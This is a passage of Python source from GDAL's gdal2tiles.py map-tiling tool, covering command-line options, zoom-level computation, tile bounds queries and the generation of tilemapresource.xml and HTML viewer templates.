"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
# MapML options
g = OptionGroup(p, "MapML options",
"Options for generated MapML file")
g.add_option("--mapml-template", dest='mapml_template', action="store_true",
help=("Filename of a template mapml file where variables will "
"be substituted. If not specified, the generic "
"template_tiles.mapml file from GDAL data resources "
"will be used"))
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
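# Example (illustrative): parse a typical command line the same way process_args() does.
# parser = optparse_init()
# opts, args = parser.parse_args(['-p', 'mercator', '-z', '2-5', 'input.tif', 'tiles'])
# print(opts.profile, opts.zoom, args)            # -> mercator 2-5 ['input.tif', 'tiles']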
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Directory named after the input file (without extension), in the current directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
if options.webviewer == 'mapml':
options.xyz = True
if options.profile == 'geodetic':
options.tmscompatible = True
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
if options.tilesize:
self.tile_size = options.tilesize
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read a bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for wavelet-based drivers (JPEG2000, ECW, MrSID)
# Not for the 'raster' profile
self.scaledquery = True
# How big should the query window be for scaling down?
# Reset later according to the chosen resampling algorithm
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
if int(zoom_max) < self.tminz:
raise Exception('max zoom (%d) less than min zoom (%d)' %
(int(zoom_max), self.tminz))
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
if input_dataset.GetRasterBand(1).DataType != gdal.GDT_Byte:
exit_with_error(
"Please convert this file to 8-bit and run gdal2tiles on the result.",
"To scale pixel values you can use:\n"
"gdal_translate -of VRT -ot Byte -scale %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
self.in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(self.in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile != 'raster':
if not self.in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs EPSG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, self.in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
srs4326.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behavior, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator(tile_size=self.tile_size)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
elif self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible, tile_size=self.tile_size)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
elif self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = max(0, int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size))))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
elif self.tmaxz > self.nativezoom:
print('Clamping max zoom level to %d' % self.nativezoom)
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(self.in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
if self.options.xyz:
north = self.omaxy - y * self.tile_size * pixelsizex
south = north - self.tile_size * pixelsizex
else:
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tms = tmsMap[self.options.profile]
# Function which generates SWNE in LatLong for given tile
self.tileswne = None # not implemented
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, tms.level_count+1))
for tz in range(0, tms.level_count+1):
tminx, tminy = tms.GeorefCoordToTileCoord(self.ominx, self.ominy, tz, self.tile_size)
tmaxx, tmaxy = tms.GeorefCoordToTileCoord(self.omaxx, self.omaxy, tz, self.tile_size)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(tms.matrix_width * 2**tz - 1, tmaxx), min(tms.matrix_height * 2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = tms.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size), self.tile_size)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = tms.ZoomForPixelSize(self.out_gt[1], self.tile_size)
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (georef):", self.ominx, self.ominy, self.omaxx, self.omaxy)
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:", self.tmaxz)
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
else:
self.swne = None
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.xyz and self.swne is not None and (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml'))):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
# Generate mapml file
if self.options.webviewer in ('all', 'mapml') and \
self.options.xyz and \
self.options.profile != 'raster' and \
(self.options.profile != 'geodetic' or self.options.tmscompatible) and \
(not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'mapml.mapml'))):
with open(os.path.join(self.output_folder, 'mapml.mapml'), 'wb') as f:
f.write(self.generate_mapml().encode('utf-8'))
if self.kml and self.tileswne is not None:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
ytile = GDAL2Tiles.getYTile(ty, tz, self.options)
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ytile, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
elif self.options.profile != 'raster':
b = tmsMap[self.options.profile].TileBounds(tx, ty, tz, self.tile_size)
# Don't scale up by nearest neighbour; instead change the querysize
# to the native resolution (and return a smaller query tile) for scaling
if self.options.profile != 'raster':
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
querysize = self.tile_size
rx = tx * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
ry = ty * tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if not self.options.xyz:
ry = ysize - (ty * tsize) - rysize
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = max(1, int((lrx - ulx) / geotran[1] + 0.5))
rysize = max(1, int((lry - uly) / geotran[5] + 0.5))
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
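# Example (illustrative, hypothetical dataset): for a 1000x1000 raster with a
# one-unit pixel size, a query window that starts 100 units left of the raster is
# clamped: rx becomes 0, rxsize keeps only the overlapping columns, and the clipped
# share of the window is shifted into wx/wxsize so the tile keeps a transparent border.
# rb, wb = tiler.geo_query(ds, -100, 0, 400, -400, querysize=256)  # tiler: GDAL2Tiles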
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
